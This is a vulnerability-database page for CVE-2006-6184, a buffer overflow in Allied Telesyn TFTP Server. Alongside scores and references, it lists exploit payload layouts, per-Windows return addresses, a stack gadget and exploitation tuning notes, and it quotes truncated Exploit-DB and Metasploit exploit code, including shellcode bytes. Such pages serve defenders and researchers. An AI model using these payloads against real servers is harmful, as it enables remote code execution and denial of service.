CVE-2006-6184
published 2006-12-01CVE-2006-6184: Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service…
PriorityP263critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
65.65%
99.2th percentile
Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| alliedtelesyn | at-tftp | <= 1.9 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x02 followed by 300 bytes of \x41 + \x00 + netascii + \x00 (DoS payload)
bytes↗
\x00\x02 + 25-byte NOP sled + payload + ret + \x83\xc4\x28\xc3 + \x00 + netascii + \x00 (Metasploit WRQ overflow)
bytes↗
\x00\x02 + 63-byte NOP sled + shellcode + \xf4\xf5\xe3\x75 + \x00 + netascii + \x00 (Perl exploit WRQ payload)
bytes↗
Return address 0x702ea6f7 (Windows NT SP4 English)
bytes↗
Return address 0x750362c3 (Windows 2000 SP0 English)
bytes↗
Return address 0x75031d85 (Windows 2000 SP1 English)
bytes↗
Return address 0x7503431b (Windows 2000 SP2 English)
bytes↗
Return address 0x74fe1c5a (Windows 2000 SP3 English)
bytes↗
Return address 0x75031dce (Windows 2000 SP4 English)
bytes↗
Return address 0x71ab7bfb (Windows XP SP0/1 English)
bytes↗
Return address 0x71ab9372 (Windows XP SP2 English)
bytes↗
Return address 0x7c86fed3 (Windows Server 2003)
bytes↗
Return address \xf4\xf5\xe3\x75 — call [ESP+28] in IMM32.dll on win2k Server SP4 Italian
- →Trigger: TFTP WRQ (opcode \x00\x02) or RRQ (opcode \x00\x01) packet with a filename field exceeding ~210–300 bytes sent to UDP/69; the overflow occurs in the filename parsing before the mode string (e.g., 'netascii'). ↗
- →The Metasploit module uses EXITFUNC=process and a StackAdjustment of -3500; payload space is 210 bytes with null byte as the only bad character — useful for tuning payload-based signatures. ↗
- →The stack-smashing gadget \x83\xc4\x28\xc3 (add esp, 0x28 / retn) appears immediately after the return address in the Metasploit exploit and can serve as a byte-level signature in UDP payload inspection. ↗
- →AT-TFTP v2.0 is also vulnerable to a similar stack-based buffer overflow via a long filename in a RRQ (\x00\x01) packet; SEH overwrite occurs at 261 bytes of filename data. ↗
- ·The Metasploit module requires LHOST to be set because the NOP sled length is calculated as (25 - len(LHOST)); an incorrect LHOST shifts the payload and may cause exploitation failure. ↗
- ·Return addresses are OS/SP-specific; the module provides targets for Windows NT SP4 through Windows Server 2003 (English). Non-English or unlisted SP versions are not covered and exploitation will fail. ↗
- ·The AT-TFTP v2.0 variant (exploit-db 24952) triggers an SEH overwrite at 261 bytes but no exception is raised (possibly due to a stack cookie), making it a crash/DoS only — not reliably exploitable for code execution. ↗
- ·The null byte (\x00) is the only bad character for the payload; any shellcode or ROP chain used must be null-free. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
exploitdb·2013-04-12
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow (Denial of Service) (PoC)
---
# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage: http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1
# Version: 2.0
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF disovered in 2006 by [email protected] to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely.
#
#!/usr/bin/python
import
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
exploitdb·2011-03-05
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
---
##
# $Id: attftp_long_filename.rb 11882 2011-03-05 21:00:57Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
request (get/write) for an overly long file name.
},
'Author' => [ 'Patrick Webster ' ],
'Version' => '$Revision: 11882 $',
'References' =>
[
['CVE', '2006-6184'],
['OSVDB', '11350'],
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service
exploitdb·2009-12-22
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service
---
//################################################
//
//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]
//Website: www.teraexe.com
//
//################################################
#include
#include
#pragma comment(lib, "ws2_32.lib")
char Buffer_Overflow[] =
"\x00\x02"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x
Exploit-DB
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow
exploitdb·2006-12-03
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow
---
#!/usr/bin/perl -w
#acaro[at]jervus.it
#https://www.securityfocus.com/bid/21320
#
# [email protected] is credited with the discovery of this vulnerability
use IO::Socket;
if(!($ARGV[1]))
{
print "Uso: atftp-19.pl \n\n";
exit;
}
$victim = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
$pad = "\x90"x63;
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xf1".
"\xf1\x59\x06\x83\xeb\xfc\xe2\xf4\x0d\x19\x1d\x06\xf1\xf1\xd2\x43".
"\xcd\x7a\x25\x03\x89\xf0\xb6\x8d\xbe\xe9\xd2\x59\xd1\xf0\xb2\x4f".
"\
Metasploit
Allied Telesyn TFTP Server 1.9 Long Filename Overflow
metasploit
Allied Telesyn TFTP Server 1.9 Long Filename Overflow
Allied Telesyn TFTP Server 1.9 Long Filename Overflow
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
No writeups or analysis indexed.
http://secunia.com/advisories/23106http://securityreason.com/securityalert/1929http://securityreason.com/securityalert/8120http://www.exploit-db.com/exploits/16350http://www.exploit-db.com/exploits/24952http://www.osvdb.org/11350http://www.securityfocus.com/archive/1/452743/100/0/threadedhttp://www.securityfocus.com/bid/21320http://www.vupen.com/english/advisories/2006/4737https://exchange.xforce.ibmcloud.com/vulnerabilities/30539http://secunia.com/advisories/23106http://securityreason.com/securityalert/1929http://securityreason.com/securityalert/8120http://www.exploit-db.com/exploits/16350http://www.exploit-db.com/exploits/24952http://www.osvdb.org/11350http://www.securityfocus.com/archive/1/452743/100/0/threadedhttp://www.securityfocus.com/bid/21320http://www.vupen.com/english/advisories/2006/4737https://exchange.xforce.ibmcloud.com/vulnerabilities/30539
2006-12-01
Published